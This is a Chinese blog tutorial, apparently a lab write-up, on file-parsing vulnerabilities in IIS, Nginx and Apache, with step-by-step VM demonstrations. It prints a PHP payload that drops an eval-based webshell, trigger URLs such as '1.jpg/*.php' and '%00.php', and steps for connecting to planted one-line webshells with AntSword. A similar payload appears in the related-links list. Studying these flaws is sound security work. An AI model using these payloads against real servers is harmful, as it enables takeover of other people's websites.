文件解析漏洞总结

最新推荐文章于 2024-06-13 19:39:02 发布
最新推荐文章于 2024-06-13 19:39:02 发布
阅读量634 收藏 4
点赞数 2
分类专栏: 中间件解析漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/111026423
版权

1. IIS 5.x/6.0解析漏洞

(1)目录解析漏洞(.asp目录下所有后缀名的文件都被解析成.asp文件)
演示:
环境:Windows Server 2003(其中自带IIS服务)
环境搭建IIS步骤:开始–设置–控制面板–添加或删除程序–添加/删除组件–把应用程序服务勾起点详细信息把ASP.exe勾起,然后安装即可
最主要的是对IIS服务器的配置:打开IIS管理器–本机–网站–默认网站右键属性,得到如下图
在这里插入图片描述
在这里插入图片描述
在我搭建过程中,可以访问根目录下但无法访问根目录下的目录中的文件:
解决方法:
在IIS中选择您的站点->右键->属性,在主目录选项中,修改"执行权限"为"脚本和可执行文件"。
在IIS中选择服务器扩展->右键->属性,勾选“允许所有未知CGI”、“允许所有未知ISAPI”。
<1>进行端口转发,使本机能够访问虚拟机IIS服务器网址,虚拟机用的NAT模式
在这里插入图片描述
<2>环境配置好后,用本机访问该网址
在这里插入图片描述
<3>虚拟机打开网站根目录,在其下创建一个1.txt,在其里面写出ASP一句话木马
在这里插入图片描述
<4>用网站访问该文件
在这里插入图片描述
成功访问
<5>接着在网站根目录下新建一个1.asp目录,然后将1.txt移进去
在这里插入图片描述
<6>用网站继续访问该文件
在这里插入图片描述
发现空白页面,说明asp被成功解析
<7>用蚁剑进行连接
在这里插入图片描述
成功,因此目录解析漏洞演示成功。
(2)文件名解析漏洞(后缀名分号后不解析)
<1>虚拟机打开网站根目录,在其下创建一个2.txt,在其里面写出ASP一句话木马
在这里插入图片描述
<2>用网站访问该文件
在这里插入图片描述
<3>更改该文件的后缀名
在这里插入图片描述
<4>再次访问该文件
在这里插入图片描述
发现空白页面,说明asp被成功解析
<5>用蚁剑进行连接
在这里插入图片描述
成功,因此文件名解析漏洞演示成功。

2.IIS7.0/7.5/Nginx<8.03畸形解析漏洞

在默认Fast-CGI开启状况下,黑客上传一个名字为1.jpg,内容为

<?PHP fputs(fopen(‘shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>

在这里插入图片描述
然后访问1.jpg/.php,在这个目录就会生成一句话木马shell.php
www.xxx.com/1.jpg/*.php触发漏洞(存在漏洞就会把前面的文件当作php执行)

3.Nginx<0.8.3空字节代码执行漏洞

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37Nginx在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码

4.Apache解析漏洞

(从右往左解析第一个能识别的后缀名)
多后缀名解析:x.php.xxx
Apache认为一个文件可以有多个后缀名,例如:x.php.xxx。Apache的解析规则是从右往左依次判断后缀名,当Apache不认识这个后缀名时,就继续往左判断后缀名,从右往左都没有认识的,apache就会把该文件当做默认类型进行处理,一般,默认类型是text/plain。mime.types文件记录着apache认识的后缀。通过.xxx绕过检测,借助apache的特性解析php文件
演示:
Kali中是用apache服务搭建网站,因此打开kali
<1>查看端口开发情况
命令:netstat -teln
在这里插入图片描述
发现只有22端口是开放的,我们访问网站需要80端口,因此需要开放80端口,一个完整的web服务器需要apache+php+mysql
Apache和mysql是kali自带的,因此直接打开服务即可,而php需要自己去安装
<2>打开apache和mysql服务
命令:systemctl start 服务名
在这里插入图片描述
<3>下载php环境
命令:apt-get install php5 php-pear
第<2>和<3>相当于搭建一个简单的web服务器
<4>再次查看端口开放情况
在这里插入图片描述
发现开放端口成功
<5>查看kali的ip地址
在这里插入图片描述
<6>通过主机访问网址(即kali的ip地址加端口)
在这里插入图片描述
成功打开默认网址
<7>apache的默认文件在var/www/html下的index.html,因此进入网站根目录下
在这里插入图片描述
<8>为了验证多后缀名解析,新建x.php.xxx文件
在这里插入图片描述
<9>对文件进行编辑,写入php一句话木马
在这里插入图片描述
<10>查看此目录下此文件是否创建成功
在这里插入图片描述
可以看到成功
<11>本机访问此文件
在这里插入图片描述
发现这里直接显示出文件内容,说明apache2中没有解析php的mime类型,因此需要进行添加
<12>找到文件并编辑
在这里插入图片描述
在这里插入图片描述
<13>再次访问x.php.xxx
在这里插入图片描述
发现什么都没显示,说明php解析成功

注意:此处大家应该有很多疑问,因为ip地址换成本地ip了,而不是10.0.78.29(虚拟机ip),因为之前用的网线使用桥接模式,之后没有网线的时候继续写这篇文章,用的无线,因此将虚拟机改为了NAT模式,再次访问虚拟机web服务器时连接不上,所以我这里做了一个端口转发,如下图
在这里插入图片描述
这样就可以连接到虚拟机的web服务器了
<14>通过蚁剑进行连接
在这里插入图片描述
在这里插入图片描述
成功,因此apache解析漏洞演示成功。

5.Htaccess文件解析

例如写一个.htaccess文件内容为:
在这里插入图片描述
先上传3.gif,再上传.htaccess文件便可以解析成php文件

番茄酱料
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件解析漏洞大全
scu_hacker博客
01-25 6141
目录 前言 一、apache解析漏洞 二、nginx解析漏洞 2.1nginx<8.03 2.2nginx 0.5,0.6,0.7 <= 0.7.65, 0.8 <= 0.8.37 三、IIS解析漏洞 3.1IIS 5.0/6.0 3.2 IIS 6.0 3.3IIS 7.x 四、windows解析漏洞 4.1​​​​​​​上传jsp%20的文件或者jsp.,windows会删除.和空格 ​​​​​​​4.2上传jsp::DATA文件,windows会...
web安全目录遍历漏洞学习及绕过
m0re's blog
09-08 3418
本文目录目录遍历漏洞介绍一些绕过方式防御如何利用目录遍历上传shell并拿到一个低权限 目录遍历漏洞介绍 路径遍历攻击(也称为目录遍历)是指在访问储存在web根目录文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为 “点-点斜线”、“目录遍历”、“目
解析漏洞文件上传漏洞学习--2023/03/16-18
m0_53689197的博客
03-18 486
护网学习--2023/03/16-18
文件解析漏洞
最新发布
wbplife的博客
06-13 524
该版本默认将*.asp;.jpg 此种格式的文件名,当成Asp解析。服务器默认不解析;号及其后面的内容,相当于截断。iis除了会将asp解析成脚本执行文件之外,还会将 cer cdx asa 扩展名解析成asp;通过文件上传,或者创建文件,格式为*.asp;.jpg在IIS7.0和IIS7.5版本下也存在解析漏洞,在Fast-CGl运行模式下,在一个文件路径 /xx.jpg 后面加上/.php会将 /xx.jpg/.php 解析为php文件。利用条件。
常见的解析漏洞总结
m0_51428325的博客
12-26 1008
一、解析漏洞 解析漏洞指的是服务器应用程序在解析某些精心构造的后缀文件时,会将其解析成网页脚本,从而导致网站的沦陷。大部分解析漏洞的产生都是由应用程序本身的漏洞导致的。 二、常见的解析漏洞 1、IIS5.x-6.x解析漏洞 使用 IIS5.x-6.x 版本的服务器,大多为Windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,不能解析aspx文件。 目录解析漏洞 IIS6.0中的目录解析漏洞,如果网站目录中有一个 *.asp/ 的文
目录解析漏洞的原理及利用
whatiwhere的博客
11-15 1884
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解iis6.0目录解析漏洞的原理 掌握漏洞的利用方法 实验工具 Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,...
finecms-含有前台文件上传漏洞源码包.zip
01-04
一旦文件成功上传并被服务器解析执行,攻击者就可以实现远程代码执行,进一步控制网站或服务器。 4. **源码分析** 在FineCMS的源码中,涉及文件上传的部分可能没有正确地过滤非法文件类型,或者在验证文件扩展名时...
专题资料(2021-2022年)AndroidNative层文件解析漏洞挖掘指南讲解.doc
07-19
Android Native 层文件解析漏洞挖掘指南 Android Native 层文件解析漏洞挖掘是一种常见的安全漏洞,特别是在 Android 平台上。该漏洞可以导致应用程序崩溃,导致用户数据泄露和恶意攻击。为挖掘这种漏洞,我们需要...
iis畸形文件漏洞1
08-08
通过对网页源代码的分析,攻击者发现可以修改上传字段的名称和值,利用IIS的文件解析漏洞,尝试上传ASP(Active Server Pages)文件,这是一种支持脚本语言的服务器端文件类型,通常用来创建动态网页。 在这种情况...
任意文件下载知识点总结.zip
05-08
1. **路径遍历**:攻击者能够构造URL,使服务器解析文件系统的绝对路径,从而访问任意文件。 2. **权限不足**:服务器没有正确限制对敏感目录的访问,使得非授权用户可以查看或下载敏感文件。 3. **输入验证不严**...
解析cap文件
09-03
总结起来,cap文件解析涉及网络监控、故障排查、安全分析等多个领域,是IT运维和网络安全工作中不可或缺的工具。通过Wireshark、Tcpdump等工具,以及像Cap4j这样的库,我们可以深入理解网络通信的细节,提升网络管理...
Web安全—文件上传(解析漏洞
zhdf160916的博客
11-21 6094
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传:文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1、文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上传行为可能导致网站甚至整个服务器被控制。恶
常见文件解析漏洞总览
qq_42067124的博客
04-23 496
文件解析漏洞是指由于应用程序对上传的文件类型和内容没有充分的验证和过滤,导致一些特殊文件被 IIS、apache、nginx 或其他 Web服务器在某种情况下解释成脚本文件执行。导致攻击者可以上传恶意文件,绕过应用程序的安全限制,执行恶意代码或者访问敏感数据的漏洞
IIS7.0 畸形解析
weixin_30752377的博客
04-27 213
1.jpg 内容“<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>”www.xxxx.com/upload/1.jpg www.xxxx.com/upload/1.jpg/shell.php 访问后生成下面的一句话www.xxxx.com/upload/shell.phpIIS7.0的畸形解析和这个类似。...
[web安全-文件上传漏洞解析,及常见绕过方式]简单易懂超友好
m0_73033023的博客
04-20 2650
有时候服务器会对上传上去的图片进行二次渲染,生成一张新的图片,从而过滤掉webshell脚本,这时只需要将渲染后的图片与渲染前的图片进行对比,查看二者相同的地方,也就是渲染未改动的地方,在此处插入webshell脚本即可,网上推荐用gif图片。如果程序里面存在这种漏洞,那么恶意攻击者可以直接向你的服务器上传一个 webshell( 又称 ASP 木马、PHP 木马、JAVA木马等即利用服务器端的文件操作语句写成的动态网页,可以用来编辑你服务器上的文件 ),从而控制你的网站。
文件包含漏洞全解
2301_78287784的博客
06-15 943
以上就是文件包含漏洞所有的内容,通过以上的介绍,我们可以看出文件包含漏洞利用难度,也可以根据他的原理提出修复建议:1、可以限制用户访问文件的权限;2、include函数中的参数用户是否可控,如果可控,则要限制;3、增加过滤,对用户输入的敏感参数进行过滤;4、配置文件中不必要开的参数设置为OFF等等,希望本文能对你有所帮助,星光安全面向基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值